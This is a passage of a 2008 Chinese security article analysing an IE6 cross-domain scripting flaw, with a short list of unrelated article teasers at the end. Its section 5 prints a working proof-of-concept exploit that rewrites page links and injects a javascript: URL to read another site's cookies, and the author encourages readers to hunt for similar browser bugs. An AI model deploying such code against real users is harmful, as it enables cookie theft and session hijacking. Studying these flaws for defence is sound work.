揭密鬼页 浅析浏览器跨域安全问题(3)
来源:IT 专家网 发布时间:2008-10-07 18:11:00
标签:安全,浏览器,javascript
5.灾难性的后果
到这里我们发现了一个IE6的0DAY,一定程度上这个跨域安全问题是灾难性的,如下面的
EXP:
<a href="">IE6 Cross Domain Scripting</a>
<script>
function win(){
x=window.open('http://www.phpwind.net');
setTimeout(function(){
x.location=new String("javascript:alert(document.cookie)")
},3000)
}
window.onload=function(){
for (i=0;i<document.links.length;i++) {
document.links[i].href="javascript:win()"
}
}
</script>
点击链接后,马上得到了PHPWIND论坛的COOKIE,这就意味着黑客通过类似的攻击可以得到你访问过的任意网站的COOKIE,然后劫持你的会话。
这样的漏洞相当于一个没有域限制的XSS漏洞,几乎是无法防御的,网站只能进一步的加强客户端的会话安全,如使用SSL加密连接、设置安全COOKIE加上HTTPONLY参数、给敏感的请求操作加上水印等。
6.总结
这个跨域安全问题的本质是浏览器在处理window对象的操作有所疏漏,没有考虑清楚不同域有继承关系的window对象操作后的变化,只是对window对象的一些方法的参数做了类似数据类型的限制,导致最后绕过限制跨域执行了脚本。
从这个漏洞我们也可以看出IE7的一些新的安全特性,通过继承关系的window对象操作来跨域执行脚本伪协议最后是判断了域的,IE7已经开始防范类似的攻击。
但是这里并没有在本质上解决跨域安全问题,IE7只防范了跨域执行脚本,对于其他跨域的操作仍然是放行的,所以鬼页在IE7下可以跨域操作框架URL,而Firefox却没有存在相同的问题,说明不同浏览器在安全的考虑上也是存在很多差异的。
针对IE我又测试了其他对象方法,发现很多都被限制住了,但不排除还有同样的问题存在。按照类似的思路,大家可以继续尝试挖掘浏览器的一些跨域漏洞。
0
投稿猜你喜欢
- PHPWind v7.3.2开启门户模式为默认后打开read页面导致浏览器死掉问题。打开:mode/area/template/read.h
- 千橡互动集团CEO兼董事长陈一舟(陈一舟新闻,陈一舟说吧)在日前举行的中国国际数字娱乐领袖峰会上表示,目前中国原创网络游戏发展面临的三大挑战
在了解了Exchange Server Store的工作方式和特点以后,我们接下来介绍一些邮件存储系统的管理技巧。管理员在掌握了原理以后会对- 因为种种原因,已经有很长时间没有发过东西了。天刃今天抽时间,把大家最近反应最多的问题整理下,和大家聊聊。第一个问题就是百度最近算法调整的影响
- 什么是baiduspider?baiduspider是百度搜索引擎的一个自动程序。它的作用是访问互联网上的html网页,建立索引数据库,使用
- 如果你在你的托管帐户上存储了archive files,你可能需要unarchive它们,要么再次使用某个老的文档,要么只是解压某个你已上传
- 最近陆续有很多站长过来询问伪静态的问题,现就分享下目前网上流行的各种程序在iis下的规则和设置方法:shopex4.8下载3.0的免费Rew
- 以下是我的iptables设置 *filter:INPUT DROP [0:0]:FORWARD ACCEPT [0:0]:OUT
- 错误描述: Win7下使用IIS7.5 发布Asp网站,提示HTTP 错误 404.3 – Not Found由于扩展配置问题而无
- 环境是linux as 4在我创建dbca的时候出现如下错误:Xlib:connection to ":0.0" ref
- RabbitMQ简介RabbitMQ是一个开源的AMQP实现,服务器端用Erlang语言编写,支持多种客户端,如:Python、Ruby、.
- 前置条件容器化spring boot应用所需环境:jdk 1.8 +maven 3.0 +我们的需求是:使用maven打包,将spring
- 升级IE8浏览器后,无法上传图片,总是提示“无效图片”,重置IE浏览器无效,使用IE7浏览器时一起正常。那么这个情况应该怎么办呢?请用户打开
- 在浏览有些网站时,真的不知道网页上面哪些是广告,哪些是网站提供的内容了。新浪新闻频道首页上就有和ChinaHR合作,点击后跑出了新浪网,这些
- 本文代码摘自Low End Box,LEB的站长因为成功搭建了80M的WEB环境而被业内传为佳话,这一次他懒惰,不想长篇大论,就
- 1、统计出/etc/passwd文件中其默认shell为非/sbin/nologin的用户个数,并将用户都显示出来grep是一个文本工具,是
- 如果你的服务器apache还没有安装,那很简单,在编译apache时将mod_rewrite模块编译进去就可以,相关文档可以在http://
- 本文通过七步设置介绍了针对Windows 2000和Windows XP操作系统如何防范非法用户入侵的“七招&r
- 本文讲解如何制作自己的tomcat镜像,并使用tomcat部署项目原料准备:tomcat、jdk安装包,dockerfile文件步骤1、准备
- 10月10日消息,据南方都市报报道,新闻出版总署有关负责人昨日表示,10月份新闻出版总署将集中力量联合组织一次对网络游戏审批和运营服务的全面
